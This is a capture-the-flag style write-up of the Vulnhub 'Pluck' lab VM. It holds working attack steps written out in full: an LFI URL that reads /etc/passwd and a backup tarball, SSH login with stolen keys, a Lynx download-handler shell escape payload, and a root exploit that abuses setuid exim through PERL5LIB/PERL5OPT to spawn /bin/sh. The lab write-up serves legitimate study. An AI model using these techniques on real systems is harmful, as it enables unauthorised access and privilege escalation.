Vulnhub: Pluck 1

Author: Tanoy Bose
2017-03-12 Comments

Introduction

Just another writeup for another boot2root Vulnhub Challenge. This one is great to test out different types of exploitation techniques.

Recon

Figure out IP. Ofcourse, when you boot the machine it shows you the IP before the login as well.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
n0tty@c0ffee$ nmap -vvv -p- -A 192.168.56.101
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-12 17:42 IST
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Initiating ARP Ping Scan at 17:42
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 17:42, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:42
Completed Parallel DNS resolution of 1 host. at 17:42, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:42
Scanning 192.168.56.101 [65535 ports]
Discovered open port 80/tcp on 192.168.56.101
Discovered open port 22/tcp on 192.168.56.101
Discovered open port 3306/tcp on 192.168.56.101
Discovered open port 5355/tcp on 192.168.56.101
Completed SYN Stealth Scan at 17:42, 1.27s elapsed (65535 total ports)
Initiating Service scan at 17:42
Scanning 4 services on 192.168.56.101
Completed Service scan at 17:44, 115.33s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.16s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 1.01s elapsed
Nmap scan report for 192.168.56.101
Host is up, received arp-response (0.00032s latency).
Scanned at 2017-03-12 17:42:22 IST for 119s
Not shown: 65531 closed ports
Reason: 65531 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFSQzgfwHXqd1xWOgf75774FzsNjlHCbQMrxD/YxArRbHivjZaqVegVI3sUiy6uO/DLcmnnjxEKpJq0QNWXIi438ctaJzDnxIeeY1WxFVNgxidy0TUdzAOPsclC9v4SeWJS1XnsrPpWWRyBI1J/KdYOtdwtJ3D7YBKONsDMokhotPiGYinBD+DYIyyWKVpNi/6Pj2PqrT1f9KZMlMdda1yEE4x0/vy0tABWnLAR9JlzbDkLY9JpFoZb7Cs+xcwpcj0JNHKnN5IfpyZZ+vGDRdxB4twukRBFkljAxkZb8/QUO83om4vTgr9eLMV4cgwIA8IJsi83puCMfiNrg+VfNwN
|   256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN5PvwhQy4P3+wVM+Tl9dFNeO1MWbOR50xImivscOMxL6HRVDbyYSFE8anA/SQntiOFqIkgk16pHSYXB2w5sgzQ=
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
TCP/IP fingerprint:
OS:SCAN(V=7.40%E=4%D=3/12%OT=22%CT=1%CU=35977%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=58C53B9D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10C%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O
OS:5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.002 days (since Sun Mar 12 17:40:53 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.56.101
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:44
Completed NSE at 17:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.64 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65554 (2.623MB)

LLMNR? Http with admin page?

For LLMNR, I run the following in the hopes of intercepting something at the very least (but to no success)

1
responder -wrfF -I vboxnet0

Exploitation

Trying the usual, I went to the About page to run CeWL on it and get myself a bruteforce dictionary. While doing this, I observed the URL to be interesting.

1
http://192.168.56.101/index.php?page=about.php

Hmmm, possible LFI? Let me try.

1
http://192.168.56.101/index.php?page=/etc/passwd

BAM!!!
LFI

Ok, what did I see here?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

let us call the backup script and see what is being done with this

1
2
3
4
5
6
7
8
9
10
11
12
http://192.168.56.101/index.php?page=/usr/local/scripts/backup.sh
#!/bin/bash
########################
# Server Backup script #
########################
#Backup directories in /backups so we can get it via tftp
echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"

ahaa! A tar file with all contents for /home and /var/www/html. Let us get hold of it.

1
n0tty@c0ffee$ curl http://192.168.56.101/index.php?page=/backups/backup.tar > backup.tar

At this stage my machines gets stuck (Yes, I am a damn poor boy!). However, after leaving my machine up for a while and having some snacks and returning, it seemed curl had done its best. Next was to untar the file and extract the contents.

1
n0tty@c0ffee$ tar -xfv backup.tar

I see the interesting /home/ folder. While searching around, I end up with /home/paul/keys/id_key*. On trying each one of them, I could finally figure out which one was the correct key and was able to ssh into the machine.

1
2
n0tty@c0ffee$ chmod 600 id_rsa*
n0tty@c0ffee$ ssh -v -i id_key4 paul@192.168.56.101

And now we have a PDMenu to crack.
pdmenu

I must say, it took me some time to figure out this one because our dear game writer had set up a lot of honey traps to get you distracted.

Interactive Shell

So, I read an interesting article here. Attempting the same,

1
2
Exploit Code =
LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
pdmenu lynx lynx exploit quit lynx shell

Rooting

The amazing part of this image is there are more than one possible ways of getting an interactive shell. Eventhough I pwn’d this via lynx exploit, while trying to root the system, I figured out there are quite a few ways that we could get access to an interactive shell.
Looking up the systen information and kernel version and other information, there was again more than one possible ways to root this box. Unfortunately on my first attempt (most of them were compilation fails maybe because I didn’t try to rectify the underlying code), keyctl, dirtycow and pkexec race condition (and a few more that failed), this is the enumeration that led to me rooting the box.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ bash
paul@pluck$ find / -perm -4000 2>/dev/null
-----------------------------------------------
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
------------------------------------------------
paul@pluck$ vi /tmp/root.pm
------------------------------------------------
package root;
use strict;
use warnings;
 
system("/bin/sh");
------------------------------------------------
paul@pluck$ PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
# whoami
root
#id
uid=0(root) gid=1002(paul) groups=1002(paul) 
#

PWNED!

cat /root/flag.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Congratulations you found the flag
---------------------------------------
######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
#Vulnhub #Pluck #boot2root